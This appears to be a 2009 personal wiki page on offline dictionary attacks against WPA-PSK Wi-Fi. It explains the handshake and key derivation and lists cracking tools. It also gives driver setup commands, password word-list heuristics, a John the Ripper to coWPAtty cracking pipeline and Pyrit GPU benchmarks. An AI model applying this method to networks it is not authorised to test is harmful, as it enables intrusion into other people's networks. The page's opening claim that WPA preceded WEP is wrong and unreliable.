WPA Attack

From ivc wiki
Revision as of 00:17, 18 September 2009 by Ivc (talk | contribs)
Jump to navigationJump to search

WPA is the precursor to WEP to fill a need for a secure replacement after the fully disclosed and flawed WEP encryption.

Background

Most wireless networks operating today use WPA and a Pre-Shared Key (PSK) between parties, i.e. a common password between the Access Point and Client Station, for protection. While the 802.11i standard, of which WPA is implemented on, is still intact the authentication is prone to a offline brute-force attack.

4-Way handshake

When a client want to connect to a access point, the following simplified stages will take place:

  1. Client will take the Password and ESSID of the network to compute a Pairwise Master Key and send a request to the AP asking to connect
  2. AP will responds with a random ANonce number
  3. Client create a random SNonce number, take the Pairwise Master Key, ANonce, SNonce, and AP and client MAC address to compute a Pairwise Transient Key
  4. Client will sign the SNonce number using the Pairwise Transient Key and send it unencrypted to the AP
  5. AP receives the signed SNonce, and compute the Pairwise Master Key from its Password and ESSID. Use the Pairwise Master Key, ANounce, SNounce, and AP and client MAC address to compute a Pairwise Transient Key
  6. By signing the SNonce message with the new Pairwise Transient Key, the AP can match the Integrity Code of the SNonce message sent from the client.
  7. If it's the same, the AP can then assume the client used the same Pairwise Master Key (Password+ESSID) to generate the Pairwise Transient Key, subsequently used to sign the message
  8. AP sends an acknowledgment to the client signed with the Pairwise Transient Key and includes information for further communication

For an excellent explanation, see the Airolib-ng manual.

Key generation

The PMK is generated using the following relatively processor intensive function, pseudo code:

  • PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)

Where the PBKDF2 method is from PKCS #5 v2.0: Password-based Cryptography Standard. This means that the concatenated string of the passphrase, SSID, and the SSIDlength is hashed 4096 times to generate a value of 256 bits. The lengths of the passphrase and the SSID have little impact on the speed of this operation [1].

And the other PTK hash is generated using this less processor intensive function, pseudo code:

  • PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))

The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake. [2].

  • MIC = HMAC_MD5(MIC Key, 16, 802.1x data)

A MIC value is calculated, using the MIC Key from the PTK and the EAPoL message.

Generating the PMK using the PBKDF2 function is slow and costly. It can be pre-computed for time-space-benefit. Both coWPAtty and Pyrit can create these hash-tables. Pyrit is especially fast as it's utilizing the GPGPU concept to speed up the process, see the Pyrit project page to see the difference.

Details:

Attack

An offline attack on the functions above are possible by disassociating any connected client(s), capturing a full 4-way handshake session when the client(s) re-connect, and then extrapolate the AP MAC, Client MAC, the ANonce and SNonce. The SSID is already known.

Present with the above information it's possible to brute-force the passphrase by computing the 4-way handshake as mentioned above (calculate the PMK, PTK, and subsequently sign the SNonce to get the Integrity Code) with every possible passphrase+SSID combination. If the passphrase is correct the Integrity Code will match the captured Integrity Code.

See the coWPAtty and Pyrit source code for examples on the handshake process.

Counter-measures

As it's explained above and clear, a long and alpha-numeric password will thwart this dictionary attack. Use a something like kurtm.net WPA-PSK generator or preferably the Yubico USB key adapter to generate a truly random password.

Tools

  • pyrit - blog - Reference manual - Code details
    • Like coWPatty and Airolib-ng
    • Pre-compute PMK keys
    • Import compressed (.gz) files
    • Supports stdin (i.e. John the Ripper piping)
    • Internal database over precomputed ESSID and PMK combinations
    • Export PMK to coWPAtty (*.cow ) and Airolib-ng (*.db) supported files
    • GPGPU acceleration
    • Strip out 4-way handshake from capture file
  • coWPAtty - coWPAtty project page - Readme
    • Like Pyrite and Airolib-ng
    • WPA-PSK attack on specific ESSID and captured 4-way handshake dump
    • Passthrough from Pyrite possible (GPGPU acceleration)
    • Pre-computed PMK tables supported
    • genpmk:
      • Generate "Pairwise Master Key" table for a specific ESSID, PMK tables
      • Table-file name should end with *.cow
  • Airolib-nb
    • Like coWPatty and Pyrit
    • Precompute TMK keys and attack WPA/WPA2 handshake captures
    • Internal SQLite3 database
    • Can export and import coWPAtty files

Extra:

Drivers

The Alfa AWUS036H adapter is a really good 500 mW USB device based on the RTL8187 chipset, but the drivers are/were buggy. Currently, as of September 2009, it seems that the Compat Wireless rtl8187/mac80211 framework drivers are the most stable and reliable for general use and the old r8187/ieee80211 drivers are most suitable for the Aircrack-ng suite and frame injection [3]. See the tutorial link below for details on how to switch between the drivers.

I can confirm that the latest rtl8187/mac80211 drivers are slow. Packet injection using same device in Backtrack 3 (BT3) was much faster than in Backtrack (BT4) pre-final. Unsure of the cause, but it seems that the latest drivers lack a speed patch used previously (see thread below). BT3 uses the r8187/ieee80211_rtl stack while BT4 uses the main kernel rtl8187/mac80211 stack with some patches already applied (the BT4 Beta, not Pre-final, had some rtl8187/mac80211 speed improvements applied).


Summary to install the BT4 r8187/ieee80211 (r8187-drivers) driver package:

aptitude search r8187
-- and look for the kernel version the driver was compiled for, and install it:
aptitude install linux-image-2.6.30.5 linux-source-2.6.30.5 
dpkg --force-overwrite -i /var/cache/apt/archives/linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb # if it reports firmware files already exists
 
reboot # to load new kernel
sudo rmmod rtl8187
sudo rmmod mac80211
echo "blacklist rtl8187" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist r8187" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist rt2870sta" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist mac80211" | sudo tee -a /etc/modprobe.d/blacklist
aptitude install r8187-drivers
modprobe r8187

Word lists

List of word lists

These are compiled word lists and readily available.

Generating word lists

By following simple guidelines a good word-list can be generated. Consider the following:

  • Most people use easy to remember passwords, in this case it has to be 8 characters or over in length
  • Append 0-9 to the word, i.e. (word)1, (word)2, (word)3, ..
  • Sequence of numbers are often used, e.g. 123, 321, 999, ..
  • First letter is often upper-case
  • Short words (under 8 characters) are stringed in series of two, e.g. googlegoogle, hellohello, openopen, ..
  • Forename and surname often used

John The Ripper and Raptor 3 are great utilities to create all the permutations mentioned above. JTP can pipe the data to avoid having to save the new stream. JTR has an extended rules engine to build the permutations.

john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | \
  cowpatty -r eap-test.dump -f - -s somethingclever [4]

Tools

GPU acceleration

CPU vs GPU.png

CUDA (Compute Unified Device Architecture) is a parallel computing architecture developed by nVidia [5]. Competitively, FireStream / Fire Processor is a stream processor developed by ATI Technologies. Both are based on the GPGPU (General Purpose Graphics Processing Units) concept for heavy floating-point computations [6]. Instead of having four or eight threads crunching on a parallelized task in the CPU, you could have 64, 320, or how many stream processors (Unified Shaders) tackling the same work in the GPU [7].

Traditionally the GPU has been very limited, only accelerating part of the graphics pipeline. Utilizing the GPU to perform floating-point computations is an order of magnitudes faster than on a modern CPU. It possible to achieve over a teraflop of theoretical computing capacity using relatively inexpensive commodity hardware.

As a side-note, SLI can not be used, only individual processor units.

Practical attak

Handy commands

Connect to OPEN network:

ifconfig wlan0 down
iwconfig wlan0 mode managed
iwconfig wlan0 essid SMC
dhclient wlan0 -d

Connect to WEP protected network:

ifconfig wlan0 down
iwconfig wlan0 mode managed
iwconfig wlan0 enc (40/104bit key)
iwconfig wlan0 essid SMC
dhclient wlan0 -d

Performance measurements

I happened to be fortunately enough to get access to a SuperMicro Dual Tesla C1060 GPU server for 10 days, special thanks to Geir over at Nextron.

Server set-up:

root@bt:~/pyrit# hdparm -tT /dev/sda

/dev/sda:
 Timing cached reads:   15464 MB in  2.00 seconds = 7740.52 MB/sec
 Timing buffered disk reads:  368 MB in  3.01 seconds = 122.19 MB/sec

Pyrit benchmark:

root@bt:~/pyrit# pyrit benchmark
Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Running benchmark for at least 60 seconds...

#1: 'CUDA-Device #1 'Tesla C1060: 12146.7 PMKs/s (Occ. 95.2%; RTT 2.6)
#2: 'CUDA-Device #2 'Tesla C1060: 12155.2 PMKs/s (Occ. 95.8%; RTT 2.8)
#3: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 98.6%; RTT 3.0)
#4: 'CPU-Core (SSE2)': 637.1 PMKs/s (Occ. 94.1%; RTT 3.0)
#5: 'CPU-Core (SSE2)': 636.8 PMKs/s (Occ. 93.9%; RTT 3.0)
#6: 'CPU-Core (SSE2)': 637.3 PMKs/s (Occ. 98.2%; RTT 3.0)
#7: 'CPU-Core (SSE2)': 643.8 PMKs/s (Occ. 93.5%; RTT 3.0)
#8: 'CPU-Core (SSE2)': 642.0 PMKs/s (Occ. 93.1%; RTT 3.0)

Benchmark done. 28131 PMKs/s total.

References